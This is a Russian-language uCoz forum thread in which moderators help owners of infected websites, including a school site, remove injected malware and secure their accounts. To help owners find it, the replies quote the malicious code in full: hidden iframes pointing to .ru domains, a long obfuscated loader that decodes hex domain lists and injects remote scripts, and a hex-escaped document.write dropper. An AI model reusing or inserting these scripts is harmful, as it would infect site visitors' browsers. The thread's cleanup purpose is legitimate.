Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика) |
| Вирусы на сайтах |
|
Как предотвратить попадание вредоносных ссылок на сайт
Диагностика
Правила подачи заявки на диагностику и поиск вредоносного кода на сайте
Полезные ссылки: Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:
|
|
Soln, отмените минимальный. остаток неиспользованных средств в течении 15 минут вернется на лицевой счет сайта. далее активируйте оптимальный
Цитата Можно ещё вопрос. |
|
Добрый день. Я учитель. Создала сайт для конкурса, вроде ничего лишнего, но Касперский не пускает на сайт, "Содержит легальную программу, которая может быть использована злоумышленником..." Другие антивирусы не видят проблемм. Адрес: http://melehovaelena.ucoz.net/. Заранее спасибо за ответ.
|
|
meleho68, ваш сайт заражен. и браузер того, кто занимается правками шаблонов сайта. панель управления - дизайн - управление дизайном - глобальные блоки - верхняя часть сайта - ищите ифреймы и длинные скрипты перед ними
ифремы выглядят так Код <iframe id="a1996667054" src="https://ec2f1xubcblb.ru/f2.html?a=27532" style="display: none;"></iframe> Код <iframe id="a754394637" src="https://3o9cpydyue4s8.ru/u.html?a=27532" style="display: none;"></iframe> длинный код начинается с <script> и заканчивается </script> ифреймы повторяются 32 раза это все надо удалить и сохранить шаблон далее из блока случайное фото удалить тоже самое. браузер полностью переустановить с удалением всех профилей |
|
|
|
Вера2929, удалите скрипт
Код <script src="http://activiks.ru/img/png.js" type="text/javascript"></script> |
|
После загрузки безобидной картинки о ПДД школьный сайт sch14.ucoz был заблокирован: Запрещено: not-a-virus:HEUR:AdWare.Script.Generic 19.02.2017 19:32:18
Научите, спасите, помогите вернуть сайт Зайти в ПУ могу. не знаю только что там удалить Сообщение отредактировал petrovna2106 - Воскресенье, 19 Фев 2017, 16:00:45
|
|
petrovna2106, браузер с которого добавили невинную картинку заражен
панель управления - редактор страниц - управление страницами сайта - главная страница - напротив главной жмите на разводной ключ - страница откроется на редактирование - ищите и удаляйте вот такой длинный код Код <script>window.a1336404323 = 1;!function(){var e=JSON.parse('["75626e7379687632376661326a2e7275","6d38316a6d716d6e2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="19831",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "sch14.ucoz.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();</script><iframe src="//ubnsyhv27fa2j.ru/f.html" style="display: none;" id="a1996667054"></iframe> браузер с которого редактировался сайт полностью переустановить с удалением профилей |
|
Сайт http://astro-ru.ru В модуле "страницы сайта" стал подгружаться какой-то скрипт, направляющий на страницу http://www.hidrolife.com.mx/wp-content/jquery/jquery.min.js?kfmlwfw Яндекс считает это фишингом.
Проверил коды на сайте, нигде этого скрипта нет. Не могу разобраться в чем проблема. То же самое на сайтах http://smartwebsite.ru и http://astrodama.ru и именно в модуле "страницы сайта". Сообщение отредактировал Amitofu - Понедельник, 20 Фев 2017, 10:03:09
|
|
Amitofu, по сайту http://astro-ru.ru/ удалить скрипт
Код <script>var _0xec54=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x73\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x78\x4D\x4D\x38\x52\x37\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xec54[25]](_0xec54[0]+ _0xec54[1]+ _0xec54[2]+ _0xec54[3]+ _0xec54[4]+ _0xec54[5]+ _0xec54[6]+ _0xec54[7]+ _0xec54[8]+ _0xec54[9]+ _0xec54[10]+ _0xec54[11]+ _0xec54[12]+ _0xec54[13]+ _0xec54[14]+ _0xec54[15]+ _0xec54[16]+ _0xec54[17]+ _0xec54[18]+ _0xec54[19]+ _0xec54[20]+ _0xec54[1]+ _0xec54[2]+ _0xec54[21]+ _0xec54[22]+ _0xec54[23]+ _0xec54[24])</script> в самом низу шаблона сайт http://smartwebsite.ru/ удалить скрипт вверху шаблона Код <script type="text/javascript"> var _0xec54=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x73\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x78\x4D\x4D\x38\x52\x37\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xec54[25]](_0xec54[0]+ _0xec54[1]+ _0xec54[2]+ _0xec54[3]+ _0xec54[4]+ _0xec54[5]+ _0xec54[6]+ _0xec54[7]+ _0xec54[8]+ _0xec54[9]+ _0xec54[10]+ _0xec54[11]+ _0xec54[12]+ _0xec54[13]+ _0xec54[14]+ _0xec54[15]+ _0xec54[16]+ _0xec54[17]+ _0xec54[18]+ _0xec54[19]+ _0xec54[20]+ _0xec54[1]+ _0xec54[2]+ _0xec54[21]+ _0xec54[22]+ _0xec54[23]+ _0xec54[24]); var browser = navigator.userAgent; var browserRegex = /(Android|BlackBerry|IEMobile|Nokia|iP(ad|hone|od)|Opera M(obi|ini))/; var isMobile = false; if(browser.match(browserRegex)) { isMobile = true; addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } } </script> сайт http://astrodama.ru/ удалите скрипт в самом верху шаблонов Код <script type="text/javascript"> var _0xec54=["\x3C","\x73","\x63\x72","\x69\x70","\x74\x20\x74\x79","\x70\x65\x3D\x22\x74","\x65\x78\x74","\x2F","\x6A\x61","\x76\x61","\x73\x63","\x72\x69","\x70\x74\x22\x20\x73\x72","\x63\x3D\x22\x68","\x74\x74","\x70\x73\x3A\x2F","\x2F\x67","\x6F","\x6F\x2E\x67","\x6C\x2F\x78\x4D\x4D\x38\x52\x37\x22\x3E","\x3C\x2F","\x69","\x70","\x74","\x3E","\x77\x72\x69\x74\x65"];document[_0xec54[25]](_0xec54[0]+ _0xec54[1]+ _0xec54[2]+ _0xec54[3]+ _0xec54[4]+ _0xec54[5]+ _0xec54[6]+ _0xec54[7]+ _0xec54[8]+ _0xec54[9]+ _0xec54[10]+ _0xec54[11]+ _0xec54[12]+ _0xec54[13]+ _0xec54[14]+ _0xec54[15]+ _0xec54[16]+ _0xec54[17]+ _0xec54[18]+ _0xec54[19]+ _0xec54[20]+ _0xec54[1]+ _0xec54[2]+ _0xec54[21]+ _0xec54[22]+ _0xec54[23]+ _0xec54[24]); var browser = navigator.userAgent; var browserRegex = /(Android|BlackBerry|IEMobile|Nokia|iP(ad|hone|od)|Opera M(obi|ini))/; var isMobile = false; if(browser.match(browserRegex)) { isMobile = true; addEventListener("load", function() { setTimeout(hideURLbar, 0); }, false); function hideURLbar(){ window.scrollTo(0,1); } } </script> далее лечимся по схеме далее все сайты переведите на индивидуальный пароль в панели управления. панель управления - безопасность - изменить пароль аккаунта - переведите на отдельный пароль и каждому сайту задайте разные пароли. далее на каждом сайте удалите всех администраторов и модераторов и даже себя удалите из администраторов. в панели управления для каждого сайта создайте локальный профиль (для каждого сайта разные пароли) и будете входить на сайт через адрес вашсайт/admin САМОЕ ГЛАВНОЕ. НА ВСЕХ САЙТАХ СМЕНИТЬ ПАРОЛЬ К ФТП запоминать пароли к фтп не надо, поэтому поставьте самые сложные из возможных что-то типа fklgjfdjgdf9er8t93th5keigu далее будете смотреть. если после всех мероприятий появится снова. опять обязательно пишите |
|
Amitofu, панель управления - пользователи - добавить пользователя. там создадите нового пользователя. его назначите администратором и входить будете данными нового пользователя. (логин и пароль) всех остальных пользователей администраторов переведите в группу пользователи. пароли ставить максимально сложные
|
|
Цитата webanet (  ) Amitofu, панель управления - пользователи - добавить пользователя. там создадите нового пользователя. его назначите администратором и входить будете данными нового пользователя. (логин и пароль) всех остальных пользователей администраторов переведите в группу пользователи. пароли ставить максимально сложные |
|
Привет! Подскажите, пожалуйста! У меня на сайте http://margaritashever.ucoz.ru/ вчера и сегодня неожиданная активность - 150 - 200 гостей. Но на хостах это никак не отражается. Я понимаю, что это не мной так заинтересовались :). А что тогда? Может, вирус?
|
|
Марго3073, к вирусам подобное не относится
|
| |||